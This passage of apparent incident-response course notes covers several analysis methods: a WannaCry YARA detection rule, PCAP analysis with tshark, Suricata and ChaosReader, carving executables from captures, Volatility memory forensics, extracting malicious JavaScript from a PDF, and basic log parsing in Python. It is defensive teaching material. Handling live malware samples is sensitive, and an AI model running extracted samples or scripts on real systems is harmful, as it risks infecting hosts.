  777. description = "WannaCry Ransomware Strings"
  778. date = "2017-05-12"
  779. weight = 100
  780.  
  781. strings:
  782. $string1 = "msg/m_bulgarian.wnry"
  783. $string2 = "msg/m_chinese (simplified).wnry"
  784. $string3 = "msg/m_chinese (traditional).wnry"
  785. $string4 = "msg/m_croatian.wnry"
  786. $string5 = "msg/m_czech.wnry"
  787. $string6 = "msg/m_danish.wnry"
  788. $string7 = "msg/m_dutch.wnry"
  789. $string8 = "msg/m_english.wnry"
  790. $string9 = "msg/m_filipino.wnry"
  791. $string10 = "msg/m_finnish.wnry"
  792. $string11 = "msg/m_french.wnry"
  793. $string12 = "msg/m_german.wnry"
  794. $string13 = "msg/m_greek.wnry"
  795. $string14 = "msg/m_indonesian.wnry"
  796. $string15 = "msg/m_italian.wnry"
  797. $string16 = "msg/m_japanese.wnry"
  798. $string17 = "msg/m_korean.wnry"
  799. $string18 = "msg/m_latvian.wnry"
  800. $string19 = "msg/m_norwegian.wnry"
  801. $string20 = "msg/m_polish.wnry"
  802. $string21 = "msg/m_portuguese.wnry"
  803. $string22 = "msg/m_romanian.wnry"
  804. $string23 = "msg/m_russian.wnry"
  805. $string24 = "msg/m_slovak.wnry"
  806. $string25 = "msg/m_spanish.wnry"
  807. $string26 = "msg/m_swedish.wnry"
  808. $string27 = "msg/m_turkish.wnry"
  809. $string28 = "msg/m_vietnamese.wnry"
  810.  
  811.  
  812. condition:
  813. any of ($string*)
  814. }
  815. ----------------------------------------------------------------------------
  816.  
  817.  
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824. ---------------------------Type This-----------------------------------
  825.  
  826. yara wannacry_2.yar wannacry.exe
  827.  
  828. -----------------------------------------------------------------------
  829.  
  830.  
  831.  
  832. ---------------------------Type This-----------------------------------
  833. cd ~
  834.  
  835. yara rules/index.yar wannacry.exe
  836.  
  837. cd rules/
  838.  
  839. ls
  840.  
  841. cd malware/
  842.  
  843. ls | grep -i ransom
  844.  
  845. ls | grep -i rat
  846.  
  847. ls | grep -i toolkit
  848.  
  849. ls | grep -i apt
  850.  
  851. cd ..
  852.  
  853. cd capabilities/
  854.  
  855. ls
  856.  
  857. cat capabilities.yar
  858.  
  859. cd ..
  860.  
  861. cd cve_rules/
  862.  
  863. ls
  864.  
  865. cd ..
  866.  
  867. ./index_gen.sh
  868.  
  869. cd ..
  870.  
  871. yara rules/index.yar wannacry.exe
  872.  
  873. yara rules/index.yar wannacry.exe > ~/students/[yourname]/blah
  874.  
  875. cd ~/students/[yourname]
  876.  
  877. cat blah | grep -v warning
  878.  
  879.  
  880.  
  881.  
  882. -----------------------------------------------------------------------
  883.  
  884.  
  885.  
  886.  
###############################
# Threat Hunting on the wire #
###############################
  890.  
  891.  
  892.  
  893.  
  894. ##################################################################
  895. # Analyzing a PCAP Prads #
  896. # Note: run as regular user #
  897. ##################################################################
  898.  
  899. ---------------------------Type this as a regular user----------------------------------
  900.  
  901. cd ~/pcap_analysis/prads
  902.  
  903. prads -r suspicious-time.pcap -l prads-asset.log
  904.  
  905. cat prads-asset.log | less
  906.  
  907. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  908.  
  909. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  910.  
  911. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  912. -----------------------------------------------------------------------
  913.  
  914.  
  915.  
  916.  
  917. ##################################
  918. # PCAP Analysis with ChaosReader #
  919. # Note: run as regular user #
  920. ##################################
  921. ---------------------------Type this as a regular user----------------------------------
  922.  
  923. cd ~/pcap_analysis/chaos_reader/
  924.  
  925. perl chaosreader.pl suspicious-time.pcap
  926.  
  927. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  928.  
  929. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  930.  
  931.  
  932. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  933.  
  934.  
  935.  
  936. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  937.  
  938.  
  939. python check-urls-virustotal.py url.lst
  940.  
  941. ------------------------------------------------------------------------
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948.  
  949.  
  950. #############################
  951. # PCAP Analysis with tshark #
  952. # Note: run as regular user #
  953. #############################
---------------------------Type this as a regular user---------------------------------
cd ~/pcap_analysis/tshark

tshark -r suspicious-time.pcap -qz io,phs

tshark -r suspicious-time.pcap -qz ip_hosts,tree
  960.  
  961. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  962.  
  963. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  964.  
  965.  
  966. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  967.  
  968. whois rapidshare.com.eyu32.ru
  969.  
  970. whois sploitme.com.cn
  971.  
  972. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  973.  
  974. tshark -r suspicious-time.pcap -qz http_req,tree
  975.  
  976. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  977.  
  978. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  979. ------------------------------------------------------------------------


###############################
# Extracting files from PCAPs #
# Note: run as regular user   #
###############################
---------------------------Type this as a regular user---------------------------------

cd ~/pcap_analysis/extract_files

foremost -v -i suspicious-time.pcap

cd output

ls

cat audit.txt

cd exe

wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py

******* NOTE: You will need to put your virustotal API key in vtlite.py *******

for f in *.exe; do python3 vtlite.py -s "$f"; sleep 15; done
---------------------------------------------------------------------------------------



###################################
# Setting up Suricata             #
# Note: run as root user          #
###################################


Here is where we will set up all of the required dependencies for the tools we plan to install
---------------------------Type this as root--------------------------
apt update
apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ flex bison libssl-dev unzip python-dev swig sendmail sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq foremost python3-dnspython
-----------------------------------------------------------------------




Now we install Suricata
---------------------------Type this as root-------------------------------
cd /root/

wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz

tar -zxvf suricata-4.0.5.tar.gz

cd suricata-4.0.5

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

make

make install

make install-conf

cd rules

cp *.rules /etc/suricata/rules/

cd /etc/suricata/

wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz

tar -zxvf emerging.rules.tar.gz
-----------------------------------------------------------------------




###############################
# PCAP Analysis with Suricata #
# Note: run as root           #
###############################
--------------------------Type this as root--------------------------------
cd ~

mkdir suricata/

cd suricata/

wget http://45.63.104.73/suspicious-time.pcap

sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/

cd suri/

cat stats.log | less

cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}

cat xx01

cat xx02

cat xx03

cat xx04

cat xx05

cat xx06
------------------------------------------------------------------------
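The grep | jq | csplit pipeline above pulls the timestamp and http block out of each HTTP event in eve.json and splits them into xx01, xx02, ... for reading one at a time. The script below is an added example, not part of the course notes or Suricata itself: it parses the same eve.json format (one JSON object per line, event_type "http") and summarizes the requests per client instead of printing them one by one. The EVE records in SAMPLE_EVE are constructed sample data in the shape Suricata emits; the addresses and hostnames are made up, and the last line is deliberately truncated to show how a partially written record is skipped.

```python
"""Summarize HTTP events from a Suricata eve.json file.

Added example, not the course's own code. Reads EVE JSON (one object per
line) and reports HTTP requests, hosts per client and user agents.
"""
import json
from collections import Counter

# Constructed sample eve.json content. The final line is truncated on purpose:
# eve.json is appended to while Suricata runs, so a reader must tolerate it.
SAMPLE_EVE = """\
{"timestamp":"2020-01-01T10:00:01.000000+0000","event_type":"flow","src_ip":"10.0.3.15","dest_ip":"10.0.3.1"}
{"timestamp":"2020-01-01T10:00:02.000000+0000","event_type":"http","src_ip":"10.0.3.15","src_port":49152,"dest_ip":"203.0.113.10","dest_port":80,"http":{"hostname":"example.test","url":"/index.html","http_user_agent":"Mozilla/4.0","http_method":"GET","status":200}}
{"timestamp":"2020-01-01T10:00:03.000000+0000","event_type":"http","src_ip":"10.0.3.15","src_port":49153,"dest_ip":"203.0.113.10","dest_port":80,"http":{"hostname":"example.test","url":"/logo.png","http_user_agent":"Mozilla/4.0","http_method":"GET","status":200}}
{"timestamp":"2020-01-01T10:00:04.000000+0000","event_type":"http","src_ip":"10.0.3.15","src_port":49154,"dest_ip":"198.51.100.7","dest_port":80,"http":{"hostname":"cdn.example.test","url":"/load.php?e=1","http_user_agent":"Mozilla/4.0","http_method":"GET","status":200}}
{"timestamp":"2020-01-01T10:00:05.000000+0000","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"10.0.3.15"}
{"timestamp":"2020-01-01T10:00:06.000000+0000","event_type":"http"
"""


def iter_events(text, event_type="http"):
    """Yield parsed EVE records of the requested event_type, skipping unparseable lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or corrupt record: skip rather than abort the whole run
        if rec.get("event_type") == event_type:
            yield rec


def http_requests(text):
    """One (timestamp, src, dst, url, user_agent, status) tuple per HTTP event.

    Mirrors the `jq ".timestamp,.http"` selection in the notes.
    """
    rows = []
    for rec in iter_events(text, "http"):
        h = rec.get("http", {})
        url = "http://%s%s" % (h.get("hostname", ""), h.get("url", ""))
        rows.append((rec["timestamp"], rec["src_ip"], rec["dest_ip"],
                     url, h.get("http_user_agent", ""), h.get("status")))
    return rows


def hosts_per_client(text):
    """Sorted list of distinct HTTP hosts contacted by each client IP."""
    seen = {}
    for _ts, src, _dst, url, _ua, _status in http_requests(text):
        host = url[len("http://"):].split("/", 1)[0]
        seen.setdefault(src, set()).add(host)
    return {src: sorted(hosts) for src, hosts in seen.items()}


def user_agents(text):
    """How many HTTP requests each User-Agent string made."""
    return Counter(row[4] for row in http_requests(text))


if __name__ == "__main__":
    for row in http_requests(SAMPLE_EVE):
        print("%s  %s -> %s  %s  [%s]  %s" % row)
    print(hosts_per_client(SAMPLE_EVE))
    print(user_agents(SAMPLE_EVE))
```

To run it against the lab output, replace SAMPLE_EVE with `open("suri/eve.json").read()`; the alert and flow records pass through iter_events untouched, so the same loop can summarize alerts by changing the event_type argument.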


#############################
# PCAP Analysis with Yara   #
# Note: run as regular user #
#############################
-------------------------Type this as a regular user----------------------------------
cd ~/pcap_analysis/YaraPcap/


python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/


cd matching_files/

ls

cat report.txt
------------------------------------------------------------------------



cd ~/memory_analysis/
volatility -h
volatility pslist -f hn_forensics.vmem
volatility connscan -f hn_forensics.vmem
volatility -f hn_forensics.vmem memdump -p 888 -D dump/
volatility -f hn_forensics.vmem memdump -p 1752 -D dump/
***Takes a few min***
cd ~/memory_analysis/dump/
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i dump/1752.dmp -t pdf -o output/pdf/
cd ~/memory_analysis/output/pdf/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd ~/memory_analysis/output/pdf/pdf/
python pdf-parser.py -s javascript --raw 00601560.pdf
python pdf-parser.py --object 11 00601560.pdf
python pdf-parser.py --object 1054 --raw --filter 00601560.pdf
python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js

cat malicious.js
-----------------------------------------------------------------------



###################################
# Lesson 8: Intro to Log Analysis #
###################################


Log into your Linux host then execute the following commands:
-----------------------------------------------------------------------
NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.



---------------------------Type This-----------------------------------
cd ~/students/[yourname]

wget http://pastebin.com/raw/85zZ5TZX

mv 85zZ5TZX access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.188 | wc -l

cat access_log | grep 141.101.80.187

cat access_log | grep 141.101.80.187 | wc -l

cat access_log | grep 108.162.216.204

cat access_log | grep 108.162.216.204 | wc -l

cat access_log | grep 173.245.53.160

cat access_log | grep 173.245.53.160 | wc -l

----------------------------------------------------------------------







######################################################
# Python: Use Python to read in a file line by line  #
######################################################


---------------------------Type This-----------------------------------

nano logread1.py


---------------------------Paste This-----------------------------------
## Open the file read-only
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print(lines)


## close the file after reading the lines.
f.close()

----------------------------------------------------------------------




---------------------------Type This-----------------------------------
$ python3 logread1.py
----------------------------------------------------------------------



Google the following:
- python difference between readlines and readline
- python readlines and readline


Here is one student's solution - can you please explain each line of this code to me?


---------------------------Type This-----------------------------------
nano ip_search.py


---------------------------Paste This-----------------------------------
#!/usr/bin/env python3

f = open('access_log')

strUsrinput = input("Enter IP Address: ")

# The client IP is the first field of each access_log line, before " - "
for line in iter(f):
    ip = line.split(" - ")[0]
    if ip == strUsrinput:
        print(line)

f.close()


----------------------------------------------------------------------




---------------------------Type This-----------------------------------
$ python3 ip_search.py
----------------------------------------------------------------------



Working with another student after class we came up with another solution:

---------------------------Type This-----------------------------------
nano ip_search2.py

---------------------------Paste This-----------------------------------
#!/usr/bin/env python3


# This line opens the log file
f = open('access_log', "r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()


# This line stores the IP that the user types as a var called userinput
userinput = input("Enter the IP you want to search for: ")



# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print(ip)

f.close()

----------------------------------------------------------------------



---------------------------Type This-----------------------------------
$ python3 ip_search2.py
----------------------------------------------------------------------
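The grep | wc -l commands in Lesson 8 and the two ip_search scripts above all answer "how many lines mention this IP" by substring matching. The script below is an added example, not one of the course's scripts: it parses each access_log line into fields with a regular expression for the Apache Common/Combined log format and counts requests by the parsed client field. That shows the difference between the two approaches on the same data: `grep 141.101.80.188 | wc -l` and `line.find(userinput)` also count a line where the address appears only in the Referer header. The log lines in SAMPLE_LOG are constructed samples using the lab's IP addresses; the fifth line is deliberately malformed to show that rejected lines are reported rather than silently dropped.

```python
"""Count requests per client IP in an Apache/Nginx access_log.

Added example, not the course's own code. Parses Common and Combined
log format lines and compares parsed-field counts with substring counts.
"""
import re
from collections import Counter

# Common Log Format, with the optional "referer" "user-agent" tail of Combined format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Constructed sample log. Line 3 mentions 141.101.80.188 only in the Referer;
# line 5 is not a valid entry; line 6 is plain Common format (no referer/agent).
SAMPLE_LOG = """\
141.101.80.188 - - [10/Dec/2019:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
141.101.80.188 - - [10/Dec/2019:12:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
141.101.80.187 - - [10/Dec/2019:12:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://141.101.80.188/" "Mozilla/5.0"
173.245.53.160 - - [10/Dec/2019:12:00:04 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" "curl/7.68.0"
this line is not a valid log entry
108.162.216.204 - - [10/Dec/2019:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 5123
"""


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_log(text):
    """Split a log into (parsed records, rejected lines)."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            rejected.append(line)
        else:
            records.append(rec)
    return records, rejected


def requests_by_ip(text):
    """Requests per client, counted on the parsed client field."""
    records, _ = parse_log(text)
    return Counter(r["ip"] for r in records)


def substring_hits(text, ip):
    """What `grep <ip> access_log | wc -l` counts: any line containing the text anywhere."""
    return sum(1 for line in text.splitlines() if ip in line)


def lines_for_ip(text, ip):
    """ip_search.py's behaviour, but on the parsed client field."""
    records, _ = parse_log(text)
    return [r for r in records if r["ip"] == ip]


def status_summary(text):
    """HTTP status code counts, useful for spotting scanning (many 404s) at a glance."""
    records, _ = parse_log(text)
    return Counter(r["status"] for r in records)


if __name__ == "__main__":
    for ip, n in requests_by_ip(SAMPLE_LOG).most_common():
        print("%-16s %d request(s); grep would count %d line(s)"
              % (ip, n, substring_hits(SAMPLE_LOG, ip)))
    print("status codes:", dict(status_summary(SAMPLE_LOG)))
    print("rejected lines:", parse_log(SAMPLE_LOG)[1])
```

For the lab file, replace SAMPLE_LOG with `open("access_log").read()` and compare requests_by_ip against the `grep | wc -l` numbers from Lesson 8; any difference points at lines where the address is not the client field.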




##################
# Challenge Labs #
##################
---------------------------Type this as a regular user----------------------------------

cd ~/pcap_analysis/prads

cp /home/ama/mta_challenge/pizzabender.pcap .

prads -r pizzabender.pcap -l prads-asset.log

cat prads-asset.log | less

cat prads-asset.log | grep SYN | grep -iE 'windows|linux'

cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'

cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
-----------------------------------------------------------------------




##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user      #
##################################
---------------------------Type this as a regular user----------------------------------

cd ~/pcap_analysis/chaos_reader/

rm -rf stream* *.html session* image* index* url* *.text

cp /home/ama/mta_challenge/pizzabender.pcap .

perl chaosreader.pl pizzabender.pcap

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr


for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u


for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst


python check-urls-virustotal.py url.lst

------------------------------------------------------------------------




#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular user---------------------------------
cd ~/pcap_analysis/tshark

cp /home/ama/mta_challenge/pizzabender.pcap .

tshark -i ens3 -r pizzabender.pcap -qz io,phs

tshark -r pizzabender.pcap -qz ip_hosts,tree

tshark -r pizzabender.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r pizzabender.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'


tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r pizzabender.pcap -qz http_req,tree

tshark -r pizzabender.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.8.21.163 | sed -e 's/\?[^cse].*/\?\.\.\./g'

tshark -r pizzabender.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.8.21.163 | grep -v 239.255.255.250 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------
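Both tshark walkthroughs (suspicious-time.pcap earlier and pizzabender.pcap here) end with the same awk | grep -v | grep <client> | sed pipeline: rebuild the URL from host and URI, drop images, stylesheets and icons, keep one client's requests, and collapse query strings so repeated requests to the same script group together. The script below is an added example, not tshark's or the course's code, that does the same thing over the tab-separated output of `tshark -r <pcap> -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri`. SAMPLE_FIELDS is constructed sample output of that command with made-up addresses and hostnames. One difference from the notes is spelled out in the code: the sed there (`s/\?[^cse].*/\?\.\.\./g`) leaves query strings whose first character is c, s or e untouched; this version masks every query string.

```python
"""Summarize HTTP requests from `tshark -T fields` output.

Added example, not the course's own code. Input is one request per line:
ip.src <TAB> ip.dst <TAB> http.host <TAB> http.request.uri
"""
from collections import Counter

# Constructed sample of the tshark field output (tab-separated).
SAMPLE_FIELDS = "\n".join([
    "10.0.3.15\t203.0.113.10\tshop.example.test\t/index.html",
    "10.0.3.15\t203.0.113.10\tshop.example.test\t/images/banner.jpg",
    "10.0.3.15\t203.0.113.10\tshop.example.test\t/css/site.css",
    "10.0.3.15\t198.51.100.7\tads.example.test\t/load.php?id=1234&x=abc",
    "10.0.3.15\t198.51.100.7\tads.example.test\t/favicon.ico",
    "10.0.3.16\t203.0.113.10\tshop.example.test\t/index.html",
    "10.0.3.15\t198.51.100.9\tdl.example.test\t/get.php?e=1",
    "10.0.3.15\t198.51.100.7\tads.example.test\t/load.php?id=9999&x=zzz",
    "\t\t\t",  # a request with no host/uri fields decoded: skipped
]) + "\n"

# The same substrings the notes exclude with `grep -v -e '\/image' -e '.css' -e '.ico'`.
STATIC_MARKERS = ("/image", ".css", ".ico")


def parse_fields(text):
    """Turn tshark field lines into (src, dst, url) tuples; skip incomplete lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4 or not all(parts[:3]):
            continue
        src, dst, host, uri = parts
        rows.append((src, dst, "http://" + host + uri))
    return rows


def is_static(url):
    """True for image, stylesheet and icon requests (noise when hunting for redirect chains)."""
    return any(marker in url for marker in STATIC_MARKERS)


def mask_query(url):
    """Collapse the query string to '?...' so differing parameter values group together.

    Unlike the sed in the notes, this masks every query string, not only those
    whose first character is outside the set c, s, e.
    """
    base, sep, _query = url.partition("?")
    return base + "?..." if sep else url


def client_requests(text, client_ip):
    """Non-static requests from one client, query strings masked, in capture order, de-duplicated."""
    out = []
    for src, dst, url in parse_fields(text):
        if src != client_ip or is_static(url):
            continue
        entry = (src, dst, mask_query(url))
        if entry not in out:
            out.append(entry)
    return out


def requests_per_host(text):
    """Request counts per http.host, the same view as `tshark -qz http_req,tree`."""
    return Counter(url.split("/")[2] for _src, _dst, url in parse_fields(text))


if __name__ == "__main__":
    for src, dst, url in client_requests(SAMPLE_FIELDS, "10.0.3.15"):
        print("%s -> %s\t: %s" % (src, dst, url))
    for host, n in requests_per_host(SAMPLE_FIELDS).most_common():
        print("%5d  %s" % (n, host))
```

To use it on the lab capture, pipe the tshark command into the script (replace SAMPLE_FIELDS with `sys.stdin.read()`) and pass the client address from the notes (10.0.3.15 or 10.8.21.163) to client_requests; the multicast 239.255.255.250 filter in the last command can be added as one more `continue` condition on dst.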


###############################
# Extracting files from PCAPs #
# Note: run as regular user   #
###############################
---------------------------Type this as a regular user---------------------------------

cd ~/pcap_analysis/extract_files

cp /home/ama/mta_challenge/pizzabender.pcap .

rm -rf output

mkdir output

foremost -v -i pizzabender.pcap

cd output

ls

cat audit.txt

cd exe

cp ~/vtlite.py .

for f in *.exe; do python3 vtlite.py -s "$f"; sleep 15; done
---------------------------------------------------------------------------------------

#############################
# PCAP Analysis with Yara   #
# Note: run as regular user #
#############################
-------------------------Type this as a regular user----------------------------------
cd ~/pcap_analysis/YaraPcap/

cp /home/ama/mta_challenge/pizzabender.pcap .


python yaraPcap.py rules-master/index.yar pizzabender.pcap -s mta_matching_files/


cd mta_matching_files/

ls

cat report.txt
------------------------------------------------------------------------